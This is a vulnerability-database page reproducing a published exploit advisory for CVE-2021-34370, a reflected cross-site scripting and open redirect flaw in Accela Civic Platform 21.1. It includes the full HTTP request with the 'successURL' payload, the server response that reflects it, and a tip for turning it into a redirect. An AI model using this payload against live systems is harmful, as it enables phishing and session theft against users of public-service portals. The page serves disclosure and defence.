Lucene search
+L

Accela Civic Platform 21.1 Cross Site Scripting / Open Redirection

🗓️ 14 Jun 2021 00:00:00Reported by Abdulazeez AlaseeriType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 240 Views

Accela Civic Platform 21.1 XSS & Open Redirect vul

Related
Code
ReporterTitlePublishedViews
Family
zdt
Accela Civic Platform 21.1 - (successURL) Cross-Site-Scripting Vulnerability
14 Jun 202100:00
zdt
attackerkb
CVE-2021-34370
9 Jun 202112:15
attackerkb
circl
CVE-2021-34370
15 Jun 202101:16
circl
cnnvd
Accela Civic Platform 跨站脚本漏洞
9 Jun 202100:00
cnnvd
cnvd
Accela Civic Platform Cross-Site Scripting Vulnerability (CNVD-2021-61770)
11 Jun 202100:00
cnvd
cve
CVE-2021-34370
9 Jun 202111:32
cve
cvelist
CVE-2021-34370
9 Jun 202111:32
cvelist
exploitdb
Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)
14 Jun 202100:00
exploitdb
nuclei
Accela Civic Platform <=21.1 - Cross-Site Scripting
16 Jul 202609:41
nuclei
nvd
CVE-2021-34370
9 Jun 202112:15
nvd
Rows per page
`# Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)  
# Software Link: https://www.accela.com/civic-platform/  
# Version: <= 21.1  
# Author: Abdulazeez Alaseeri  
# Tested on: JBoss server/windows  
# Type: Web App  
# Date: 07/06/2021  
# CVE-2021-34370  
  
  
  
================================================================  
Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1  
================================================================  
  
  
================================================================  
Request Heeaders start  
================================================================  
  
GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1  
  
Host: Hidden  
  
Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true  
  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Upgrade-Insecure-Requests: 1  
  
Te: trailers  
  
Connection: close  
  
================================================================  
Request Heeaders end  
================================================================  
  
  
  
================================================================  
Response Heeaders start  
================================================================  
HTTP/1.1 200 OK  
  
Connection: close  
  
Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter  
  
X-XSS-Protection: 0  
  
Content-Type: text/html;charset=ISO-8859-1  
  
Content-Length: 73  
  
Date: Tue, 08 Jun 2021 10:41:59 GMT  
  
  
  
<script type='text/javascript'>document.location=''^alert`1`^''</script>  
  
================================================================  
Response Heeaders end  
================================================================  
  
Payload: %27^alert`1`^%27  
  
for open redirect, replace the payload to a valid website.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation